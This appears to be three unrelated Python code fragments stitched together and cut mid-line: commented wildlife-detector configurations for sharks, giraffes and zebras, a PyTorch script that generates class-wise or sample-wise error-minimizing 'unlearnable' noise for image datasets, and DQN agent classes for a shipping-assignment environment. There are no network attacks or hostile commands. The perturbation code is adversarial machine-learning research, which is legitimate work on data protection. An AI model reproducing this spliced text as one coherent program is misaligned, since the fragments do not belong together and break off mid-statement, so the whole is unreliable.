# {'label': 'Hammerhead NMS 10%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.10, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 20%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.20, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 30%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.30, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 40%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.40, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 50%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.50, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 60%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.60, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 70%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.70, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 80%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.80, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 90%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.90, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead NMS 100%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 1.00, 'species_set' : set(['shark_hammerhead'])},
# ],
# {},
# ),
# '!hammerhead': (
# [
# {'label': 'Hammerhead NMS 40%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.40, 'species_set' : set(['shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 0%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.00, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 10%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.10, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 20%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.20, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 30%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.30, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 40%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.40, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 50%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.50, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 60%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.60, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 70%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.70, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 80%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.80, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 90%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 0.90, 'species_set' : set(['!shark_hammerhead'])},
# {'label': 'Hammerhead ! NMS 100%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'hammerhead', 'weight_filepath' : 'hammerhead', 'nms': True, 'nms_thresh': 1.00, 'species_set' : set(['!shark_hammerhead'])},
# ],
# {'offset_color': 1},
# ),
# 'ggr2-giraffe-lightnet': (
# [
# {'label': 'Giraffe NMS 0%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.00, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 10%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.10, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 20%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.20, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 30%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.30, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 40%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.40, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 50%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.50, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 60%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.60, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 70%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.70, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 80%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.80, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 90%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.90, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# {'label': 'Giraffe NMS 100%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 1.00, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['giraffe'])},
# ],
# {},
# ),
# 'ggr2-zebra-lightnet': (
# [
# {'label': 'Zebra NMS 0%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.00, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['zebra'])},
# {'label': 'Zebra NMS 10%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.10, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['zebra'])},
# {'label': 'Zebra NMS 20%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.20, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['zebra'])},
# {'label': 'Zebra NMS 30%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.30, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['zebra'])},
# {'label': 'Zebra NMS 40%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, 'nms_thresh': 0.40, 'test_gid_list': test_gid_list, 'species_mapping': species_mapping, 'species_set': set(['zebra'])},
# {'label': 'Zebra NMS 50%', 'grid' : False, 'algo': 'lightnet', 'config_filepath' : 'ggr2', 'weight_filepath' : 'ggr2', 'nms': True, | |
import argparse
import collections
import datetime
import os
import shutil
import time
import dataset
import mlconfig
import toolbox
import torch
import util
import madrys
import numpy as np
from evaluator import Evaluator
from tqdm import tqdm
from trainer import Trainer
mlconfig.register(madrys.MadrysLoss)
# General Options
parser = argparse.ArgumentParser(description='ClasswiseNoise')
parser.add_argument('--seed', type=int, default=0, help='seed')
parser.add_argument('--version', type=str, default="resnet18")
parser.add_argument('--exp_name', type=str, default="test_exp")
parser.add_argument('--config_path', type=str, default='configs/cifar10')
parser.add_argument('--load_model', action='store_true', default=False)
parser.add_argument('--data_parallel', action='store_true', default=False)
# Datasets Options
parser.add_argument('--train_batch_size', default=512, type=int, help='perturb step size')
parser.add_argument('--eval_batch_size', default=512, type=int, help='perturb step size')
parser.add_argument('--num_of_workers', default=8, type=int, help='workers for loader')
parser.add_argument('--train_data_type', type=str, default='CIFAR10')
parser.add_argument('--train_data_path', type=str, default='../datasets')
parser.add_argument('--test_data_type', type=str, default='CIFAR10')
parser.add_argument('--test_data_path', type=str, default='../datasets')
# Perturbation Options
parser.add_argument('--universal_train_portion', default=0.2, type=float)
parser.add_argument('--universal_stop_error', default=0.5, type=float)
parser.add_argument('--universal_train_target', default='train_subset', type=str)
parser.add_argument('--train_step', default=10, type=int)
parser.add_argument('--use_subset', action='store_true', default=False)
parser.add_argument('--attack_type', default='min-min', type=str, choices=['min-min', 'min-max', 'random'], help='Attack type')
parser.add_argument('--perturb_type', default='classwise', type=str, choices=['classwise', 'samplewise'], help='Perturb type')
parser.add_argument('--patch_location', default='center', type=str, choices=['center', 'random'], help='Location of the noise')
parser.add_argument('--noise_shape', default=[10, 3, 32, 32], nargs='+', type=int, help='noise shape')
parser.add_argument('--epsilon', default=8, type=float, help='perturbation')
parser.add_argument('--num_steps', default=1, type=int, help='perturb number of steps')
parser.add_argument('--step_size', default=0.8, type=float, help='perturb step size')
parser.add_argument('--random_start', action='store_true', default=False)
args = parser.parse_args()
# Convert Eps
args.epsilon = args.epsilon / 255
args.step_size = args.step_size / 255
# Set up Experiments
if args.exp_name == '':
args.exp_name = 'exp_' + datetime.datetime.now()
exp_path = os.path.join(args.exp_name, args.version)
log_file_path = os.path.join(exp_path, args.version)
checkpoint_path = os.path.join(exp_path, 'checkpoints')
checkpoint_path_file = os.path.join(checkpoint_path, args.version)
util.build_dirs(exp_path)
util.build_dirs(checkpoint_path)
logger = util.setup_logger(name=args.version, log_file=log_file_path + ".log")
# CUDA Options
logger.info("PyTorch Version: %s" % (torch.__version__))
if torch.cuda.is_available():
torch.cuda.manual_seed(args.seed)
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
device = torch.device('cuda')
device_list = [torch.cuda.get_device_name(i) for i in range(0, torch.cuda.device_count())]
logger.info("GPU List: %s" % (device_list))
else:
device = torch.device('cpu')
# Load Exp Configs
config_file = os.path.join(args.config_path, args.version)+'.yaml'
config = mlconfig.load(config_file)
config.set_immutable()
for key in config:
logger.info("%s: %s" % (key, config[key]))
shutil.copyfile(config_file, os.path.join(exp_path, args.version+'.yaml'))
def train(starting_epoch, model, optimizer, scheduler, criterion, trainer, evaluator, ENV, data_loader):
for epoch in range(starting_epoch, config.epochs):
logger.info("")
logger.info("="*20 + "Training Epoch %d" % (epoch) + "="*20)
# Train
ENV['global_step'] = trainer.train(epoch, model, criterion, optimizer)
ENV['train_history'].append(trainer.acc_meters.avg*100)
scheduler.step()
# Eval
logger.info("="*20 + "Eval Epoch %d" % (epoch) + "="*20)
evaluator.eval(epoch, model)
payload = ('Eval Loss:%.4f\tEval acc: %.2f' % (evaluator.loss_meters.avg, evaluator.acc_meters.avg*100))
logger.info(payload)
ENV['eval_history'].append(evaluator.acc_meters.avg*100)
ENV['curren_acc'] = evaluator.acc_meters.avg*100
# Reset Stats
trainer._reset_stats()
evaluator._reset_stats()
# Save Model
target_model = model.module if args.data_parallel else model
util.save_model(ENV=ENV,
epoch=epoch,
model=target_model,
optimizer=optimizer,
scheduler=scheduler,
filename=checkpoint_path_file)
logger.info('Model Saved at %s', checkpoint_path_file)
return
def universal_perturbation_eval(noise_generator, random_noise, data_loader, model, eval_target=args.universal_train_target):
loss_meter = util.AverageMeter()
err_meter = util.AverageMeter()
random_noise = random_noise.to(device)
model = model.to(device)
for i, (images, labels) in enumerate(data_loader[eval_target]):
images, labels = images.to(device, non_blocking=True), labels.to(device, non_blocking=True)
if random_noise is not None:
for i in range(len(labels)):
class_index = labels[i].item()
noise = random_noise[class_index]
mask_cord, class_noise = noise_generator._patch_noise_extend_to_img(noise, image_size=images[i].shape, patch_location=args.patch_location)
images[i] += class_noise
pred = model(images)
err = (pred.data.max(1)[1] != labels.data).float().sum()
loss = torch.nn.CrossEntropyLoss()(pred, labels)
loss_meter.update(loss.item(), len(labels))
err_meter.update(err / len(labels))
return loss_meter.avg, err_meter.avg
def universal_perturbation(noise_generator, trainer, evaluator, model, criterion, optimizer, scheduler, random_noise, ENV):
# Class-Wise perturbation
# Generate Data loader
datasets_generator = dataset.DatasetGenerator(train_batch_size=args.train_batch_size,
eval_batch_size=args.eval_batch_size,
train_data_type=args.train_data_type,
train_data_path=args.train_data_path,
test_data_type=args.test_data_type,
test_data_path=args.test_data_path,
num_of_workers=args.num_of_workers,
seed=args.seed, no_train_augments=True)
if args.use_subset:
data_loader = datasets_generator._split_validation_set(train_portion=args.universal_train_portion,
train_shuffle=True, train_drop_last=True)
else:
data_loader = datasets_generator.getDataLoader(train_shuffle=True, train_drop_last=True)
condition = True
data_iter = iter(data_loader['train_dataset'])
logger.info('=' * 20 + 'Searching Universal Perturbation' + '=' * 20)
if hasattr(model, 'classify'):
model.classify = True
while condition:
if args.attack_type == 'min-min' and not args.load_model:
# Train Batch for min-min noise
for j in range(0, args.train_step):
try:
(images, labels) = next(data_iter)
except:
data_iter = iter(data_loader['train_dataset'])
(images, labels) = next(data_iter)
images, labels = images.to(device), labels.to(device)
# Add Class-wise Noise to each sample
train_imgs = []
for i, (image, label) in enumerate(zip(images, labels)):
noise = random_noise[label.item()]
mask_cord, class_noise = noise_generator._patch_noise_extend_to_img(noise, image_size=image.shape, patch_location=args.patch_location)
train_imgs.append(images[i]+class_noise)
# Train
model.train()
for param in model.parameters():
param.requires_grad = True
trainer.train_batch(torch.stack(train_imgs).to(device), labels, model, optimizer)
for i, (images, labels) in tqdm(enumerate(data_loader[args.universal_train_target]), total=len(data_loader[args.universal_train_target])):
images, labels, model = images.to(device), labels.to(device), model.to(device)
# Add Class-wise Noise to each sample
batch_noise, mask_cord_list = [], []
for i, (image, label) in enumerate(zip(images, labels)):
noise = random_noise[label.item()]
mask_cord, class_noise = noise_generator._patch_noise_extend_to_img(noise, image_size=image.shape, patch_location=args.patch_location)
batch_noise.append(class_noise)
mask_cord_list.append(mask_cord)
# Update universal perturbation
model.eval()
for param in model.parameters():
param.requires_grad = False
batch_noise = torch.stack(batch_noise).to(device)
if args.attack_type == 'min-min':
perturb_img, eta = noise_generator.min_min_attack(images, labels, model, optimizer, criterion, random_noise=batch_noise)
elif args.attack_type == 'min-max':
perturb_img, eta = noise_generator.min_max_attack(images, labels, model, optimizer, criterion, random_noise=batch_noise)
else:
raise('Invalid attack')
class_noise_eta = collections.defaultdict(list)
for i in range(len(eta)):
x1, x2, y1, y2 = mask_cord_list[i]
delta = eta[i][:, x1: x2, y1: y2]
class_noise_eta[labels[i].item()].append(delta.detach().cpu())
for key in class_noise_eta:
delta = torch.stack(class_noise_eta[key]).mean(dim=0) - random_noise[key]
class_noise = random_noise[key]
class_noise += delta
random_noise[key] = torch.clamp(class_noise, -args.epsilon, args.epsilon)
# Eval termination conditions
loss_avg, error_rate = universal_perturbation_eval(noise_generator, random_noise, data_loader, model, eval_target=args.universal_train_target)
logger.info('Loss: {:.4f} Acc: {:.2f}%'.format(loss_avg, 100 - error_rate*100))
random_noise = random_noise.detach()
ENV['random_noise'] = random_noise
if args.attack_type == 'min-min':
condition = error_rate > args.universal_stop_error
elif args.attack_type == 'min-max':
condition = error_rate < args.universal_stop_error
return random_noise
def samplewise_perturbation_eval(random_noise, data_loader, model, eval_target='train_dataset', mask_cord_list=[]):
loss_meter = util.AverageMeter()
err_meter = util.AverageMeter()
# random_noise = random_noise.to(device)
model = model.to(device)
idx = 0
for i, (images, labels) in enumerate(data_loader[eval_target]):
images, labels = images.to(device, non_blocking=True), labels.to(device, non_blocking=True)
if random_noise is not None:
for i, (image, label) in enumerate(zip(images, labels)):
if not torch.is_tensor(random_noise):
sample_noise = torch.tensor(random_noise[idx]).to(device)
else:
sample_noise = random_noise[idx].to(device)
c, h, w = image.shape[0], image.shape[1], image.shape[2]
mask = np.zeros((c, h, w), np.float32)
x1, x2, y1, y2 = mask_cord_list[idx]
mask[:, x1: x2, y1: y2] = sample_noise.cpu().numpy()
sample_noise = torch.from_numpy(mask).to(device)
images[i] = images[i] + sample_noise
idx += 1
pred = model(images)
err = (pred.data.max(1)[1] != labels.data).float().sum()
loss = torch.nn.CrossEntropyLoss()(pred, labels)
loss_meter.update(loss.item(), len(labels))
err_meter.update(err / len(labels))
return loss_meter.avg, err_meter.avg
def sample_wise_perturbation(noise_generator, trainer, evaluator, model, criterion, optimizer, scheduler, random_noise, ENV):
datasets_generator = dataset.DatasetGenerator(train_batch_size=args.train_batch_size,
eval_batch_size=args.eval_batch_size,
train_data_type=args.train_data_type,
train_data_path=args.train_data_path,
test_data_type=args.test_data_type,
test_data_path=args.test_data_path,
num_of_workers=args.num_of_workers,
seed=args.seed, no_train_augments=True)
if args.train_data_type == 'ImageNetMini' and args.perturb_type == 'samplewise':
data_loader = datasets_generator._split_validation_set(0.2, train_shuffle=False, train_drop_last=False)
data_loader['train_dataset'] = data_loader['train_subset']
else:
data_loader = datasets_generator.getDataLoader(train_shuffle=False, train_drop_last=False)
mask_cord_list = []
idx = 0
for images, labels in data_loader['train_dataset']:
for i, (image, label) in enumerate(zip(images, labels)):
noise = random_noise[idx]
mask_cord, _ = noise_generator._patch_noise_extend_to_img(noise, image_size=image.shape, patch_location=args.patch_location)
mask_cord_list.append(mask_cord)
idx += 1
condition = True
train_idx = 0
data_iter = iter(data_loader['train_dataset'])
logger.info('=' * 20 + 'Searching Samplewise Perturbation' + '=' * 20)
while condition:
if args.attack_type == 'min-min' and not args.load_model:
# Train Batch for min-min noise
for j in tqdm(range(0, args.train_step), total=args.train_step):
try:
(images, labels) = next(data_iter)
except:
train_idx = 0
data_iter = iter(data_loader['train_dataset'])
(images, labels) = next(data_iter)
images, labels = images.to(device), labels.to(device)
# Add Sample-wise Noise to each sample
for i, (image, label) in enumerate(zip(images, labels)):
sample_noise = random_noise[train_idx]
c, h, w = image.shape[0], image.shape[1], image.shape[2]
mask = np.zeros((c, h, w), np.float32)
x1, x2, y1, y2 = mask_cord_list[train_idx]
if type(sample_noise) is np.ndarray:
mask[:, x1: x2, y1: y2] = sample_noise
else:
mask[:, x1: x2, y1: y2] = sample_noise.cpu().numpy()
# mask[:, x1: x2, y1: y2] = sample_noise.cpu().numpy()
sample_noise = torch.from_numpy(mask).to(device)
images[i] = images[i] + sample_noise
train_idx += 1
model.train()
for param in model.parameters():
param.requires_grad = True
trainer.train_batch(images, labels, model, optimizer)
# Search For Noise
idx = 0
for i, (images, labels) in tqdm(enumerate(data_loader['train_dataset']), total=len(data_loader['train_dataset'])):
images, labels, model = images.to(device), labels.to(device), model.to(device)
# Add Sample-wise Noise to each sample
batch_noise, batch_start_idx = [], idx
for i, (image, label) in enumerate(zip(images, labels)):
sample_noise = random_noise[idx]
c, h, w = image.shape[0], image.shape[1], image.shape[2]
mask = np.zeros((c, h, w), np.float32)
x1, x2, y1, y2 = mask_cord_list[idx]
if type(sample_noise) is np.ndarray:
mask[:, x1: x2, y1: y2] = sample_noise
else:
mask[:, x1: x2, y1: y2] = sample_noise.cpu().numpy()
# mask[:, x1: x2, y1: y2] = sample_noise.cpu().numpy()
sample_noise = torch.from_numpy(mask).to(device)
batch_noise.append(sample_noise)
idx += 1
# Update sample-wise perturbation
model.eval()
for param in model.parameters():
param.requires_grad = False
batch_noise = torch.stack(batch_noise).to(device)
if args.attack_type == 'min-min':
perturb_img, eta = noise_generator.min_min_attack(images, labels, model, optimizer, criterion, random_noise=batch_noise)
elif args.attack_type == 'min-max':
perturb_img, eta = noise_generator.min_max_attack(images, labels, model, optimizer, criterion, random_noise=batch_noise)
else:
raise('Invalid attack')
for i, delta in enumerate(eta):
x1, x2, y1, y2 = mask_cord_list[batch_start_idx+i]
delta = delta[:, x1: x2, y1: y2]
if torch.is_tensor(random_noise):
random_noise[batch_start_idx+i] = delta.detach().cpu().clone()
else:
random_noise[batch_start_idx+i] = delta.detach().cpu().numpy()
# Eval termination conditions
loss_avg, error_rate = samplewise_perturbation_eval(random_noise, data_loader, model, eval_target='train_dataset',
mask_cord_list=mask_cord_list)
logger.info('Loss: {:.4f} Acc: {:.2f}%'.format(loss_avg, 100 - error_rate*100))
if torch.is_tensor(random_noise):
random_noise = random_noise.detach()
ENV['random_noise'] = random_noise
if args.attack_type == 'min-min':
condition = error_rate > args.universal_stop_error
elif args.attack_type == 'min-max':
condition = error_rate < args.universal_stop_error
# Update Random Noise to shape
if torch.is_tensor(random_noise):
new_random_noise = []
for idx in range(len(random_noise)):
sample_noise = random_noise[idx]
c, h, w = image.shape[0], image.shape[1], image.shape[2]
mask = np.zeros((c, h, w), np.float32)
x1, x2, y1, y2 = mask_cord_list[idx]
mask[:, x1: x2, y1: y2] = | |
from __future__ import annotations
import functools
import logging
import numpy as np
import torch
import torch.nn as nn
import torch_geometric
import torchmetrics
from envs import shipping_assignment_state
from envs.shipping_assignment_env import ShippingAssignmentEnvironment
from torch import Tensor
from torch_geometric.nn import GCNConv, max_pool, global_max_pool
from agents.Agent import Agent
# Taken from a legacy implementaiton in the environment, to avoid the import. It's the location on the "state_vector" of the customer ID.
from agents.optimizer_agents import LookaheadAgent
from dqn.noisy_linear import NoisyLinear
_CUSTOMER_METADATA_NEURON = -3
class PyTorchAgent(Agent):
"""
Base PyTorch Agent class for agents in Seminario II (~Sep 13).
It's expected that an agent with this impl passes a network module that generates
Q values the size of the environment action space.
The agent is also responsible for converting the state into an input tensor. The
default is "state_vector" in the state named tuple.
Should override: get_state_vector, get_action, train.
Args:
env: training environment
net: The PyTorch network module.
"""
logger = logging.getLogger(__name__)
def __init__(
self, env: ShippingAssignmentEnvironment, net, epsilon, device="cpu"
) -> None:
super().__init__(env)
self.env = env
self.net = net
self.device = device
self.epsilon = epsilon
self.dcs_per_customer_array = self.env.physical_network.dcs_per_customer_array
self.invalid_penalty = self.env.physical_network.big_m_cost
def get_state_vector(self, state):
"""Must be implemented by the concrete agent"""
pass
def mask_q_values(self, q_values, state):
# Todo maybe move to the action space.
customer_node_id = state.open[0].customer.node_id
customer_id = self.env.physical_network.get_customer_id(customer_node_id)
customer_valid_dcs = self.dcs_per_customer_array[customer_id, :]
# Penalty logic: 1-valid dcs gives you invalid. Multiply that to amplify the 1s to penalty.
penalty_for_invalid = -((1 - customer_valid_dcs) * self.invalid_penalty)
masked_q_values = q_values + penalty_for_invalid
return masked_q_values
def get_action(self, state) -> int:
"""
Using the given network, decide what action to carry out
using an epsilon-greedy policy
Returns:
action
"""
# TODO Sep 13: Before copying, this code was called in a method of this class called play step, decorated with no_grad.
# Should I still no grad my stuff when this is called? Possibly, when doing the env step in the runner.
if np.random.random() < self.epsilon:
action = self.env.action_space.sample(state.open[0].customer.node_id)
else:
state_vector = self.get_state_vector(state)
if isinstance(state_vector, np.ndarray):
state_vector = torch.tensor([state_vector])
if self.device not in ["cpu"]: # TODO THIS MAY BREAK WITH GNN
state_vector = state.cuda(
self.device
) # todo maybe fix wrong type in the future.
# Getting the action with the highest Q value.
q_values = self.net(
state_vector
) # TODO check that the star OP works with regular NN
masked_q_values = self.mask_q_values(q_values, state)
logging.debug("Network output Q values")
logging.debug(q_values)
logging.debug("Masked")
logging.debug(masked_q_values)
_, action = torch.max(masked_q_values, dim=1)
action = int(action.item())
logging.debug(f"Agent chose action {action}")
return action
def reset(self) -> None:
"""TODO as of sep 13 idk if I need this anymore (was copy pasted from old ptl agent), but probably was from OpenAI impl"""
pass
def train(self, experience):
pass
class CustomerOnehotDQN(nn.Module):
"""
Simple MLP network that uses the one hot encoding of customer IDs.
Args:
num_customers: observation size, which is the total number of customers
num_dcs: action space, which is the total number of DCs.
"""
def __init__(self, num_customers: int, num_dcs: int):
super(CustomerOnehotDQN, self).__init__()
self.num_customers = num_customers
self.num_dcs = num_dcs
# Shallow.
# self.net = nn.Sequential(
# nn.Linear(self.num_customers, hidden_size),
# nn.ReLU(),
# nn.Linear(hidden_size, self.num_dcs),
# )
# ultra deep
self.net = nn.Sequential(
nn.Linear(self.num_customers, 128),
nn.Dropout(p=0.1),
nn.ReLU(),
nn.Linear(128, 64),
nn.Dropout(p=0.1),
nn.ReLU(),
nn.Linear(64, 32),
nn.Dropout(p=0.1),
nn.ReLU(),
nn.Linear(32, 16),
nn.Dropout(p=0.1),
nn.ReLU(),
nn.Linear(16, 8),
nn.Dropout(p=0.1),
nn.ReLU(),
nn.Linear(8, self.num_dcs),
)
# Check shipping_assignment_environment for the metadata neuron definition (create_state_vector, as of Sep 18)
self.customer_metadata_neuron = _CUSTOMER_METADATA_NEURON
def forward(self, x):
"""Convert the traditional state vector into one hot encoding of the customer."""
with torch.no_grad():
xp = torchmetrics.utilities.data.to_onehot(
x[:, self.customer_metadata_neuron] - self.num_dcs,
num_classes=self.num_customers,
)
return self.net(xp.float())
class CustomerDQNAgent(PyTorchAgent):
def __init__(self, env, customer_dqn, epsilon, **kwargs):
super().__init__(env, customer_dqn, epsilon=epsilon, **kwargs)
def get_state_vector(self, state):
return state.state_vector.reshape(-1)
def train(self, experience):
"""This is not needed, it's handled by PTL"""
pass
class MaskedMLPDQN(nn.Module):
"""An MLP That takes as an input a one hot encoding mask of the valid warehouses.
The motivation is that the agent doesn't have to learn tnat information and can
instead focus on which is the best warehouse in terms of optimization cost.
"""
def __init__(self, num_dcs):
super().__init__()
self.num_dcs = num_dcs
self.net = nn.Sequential(
nn.Linear(self.num_dcs, 64),
nn.ReLU(),
nn.Linear(64, 32),
nn.ReLU(),
nn.Linear(32, 16),
nn.ReLU(),
nn.Linear(16, self.num_dcs),
)
def forward(self, x):
return self.net(x.float())
class MaskedMLPDQNAgent(PyTorchAgent):
"""An MLP whose input is the mask of which DCS are valid."""
def __init__(self, env, mlp_dqn, epsilon, **kwargs):
super().__init__(env, mlp_dqn, epsilon=epsilon, **kwargs)
def get_state_vector(self, state):
latest_open_order = state.open[0]
customer_id = state.physical_network.get_customer_id(
latest_open_order.customer.node_id
)
return state.physical_network.dcs_per_customer_array[customer_id, :]
def train(self, experience):
"""This is not needed, it's handled by PTL"""
pass
class DebugMaskedMLPCheatDQN(nn.Module):
"""Debug MLP with cheat input from looakehead actions."""
def __init__(self, num_dcs):
super().__init__()
self.num_dcs = num_dcs
# The input of this cheat network is two onehots of |DC|
# self.net = nn.Sequential(
# nn.Linear(self.num_dcs, 8),
# nn.ReLU(),
# nn.Linear(8, self.num_dcs),
# )
# self.net = nn.Sequential(
# nn.Linear(self.num_dcs, self.num_dcs * 64),
# #nn.ReLU(),
# nn.Tanh(),
# nn.Linear(self.num_dcs * 64, self.num_dcs),
# )
self.net = nn.Sequential(
nn.Linear(self.num_dcs, self.num_dcs),
)
def forward(self, x):
return self.net(x.float())
class MaskedMLPWithCheatDQNAgent(PyTorchAgent):
"""This agent is to debug that the NNs are actually learning, because the lookahead input
is a cheat code and it should use it to get the best action most times."""
logger = logging.getLogger(__name__)
def __init__(self, env, mlp_dqn, epsilon, **kwargs):
